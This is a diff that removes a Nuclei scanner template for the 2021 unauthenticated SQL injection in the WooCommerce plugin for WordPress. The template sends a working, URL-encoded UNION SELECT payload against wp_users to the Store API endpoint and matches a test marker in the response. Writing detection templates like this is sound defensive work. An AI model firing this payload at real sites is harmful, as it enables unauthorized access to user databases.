■ ■ ■ ■ ■ ■
config/nuclei-templates/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml
1 | | - | id: wordpress-woocommerce-sqli |
2 | | - | |
3 | | - | info: |
4 | | - | name: Woocommerce Unauthenticated SQL Injection |
5 | | - | author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot |
6 | | - | severity: critical |
7 | | - | description: The Woocommerce plugin for Wordpress contains an unauthenticated SQL injection vulnerability. |
8 | | - | reference: |
9 | | - | - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021 |
10 | | - | - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx |
11 | | - | - https://securitynews.sonicwall.com/xmlpost/wordpress-woocommerce-plugin-sql-injection/ |
12 | | - | classification: |
13 | | - | cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
14 | | - | cvss-score: 10.0 |
15 | | - | cwe-id: CWE-89 |
16 | | - | tags: wordpress,woocommerce,sqli,wp-plugin,injection |
17 | | - | |
18 | | - | requests: |
19 | | - | - method: GET |
20 | | - | path: |
21 | | - | - '{{BaseURL}}/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500' |
22 | | - | - '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500' |
23 | | - | |
24 | | - | matchers-condition: and |
25 | | - | matchers: |
26 | | - | - type: word |
27 | | - | words: |
28 | | - | - 'sqli-test' |
29 | | - | - 'attribute_counts' |
30 | | - | - 'price_range' |
31 | | - | - 'term' |
32 | | - | condition: and |
33 | | - | |
34 | | - | - type: word |
35 | | - | words: |
36 | | - | - 'application/json' |
37 | | - | part: header |
38 | | - | |
39 | | - | - type: status |
40 | | - | status: |
41 | | - | - 200 |
42 | | - | |
43 | | - | # Enhanced by mp on 2022/03/21 |
44 | | - | |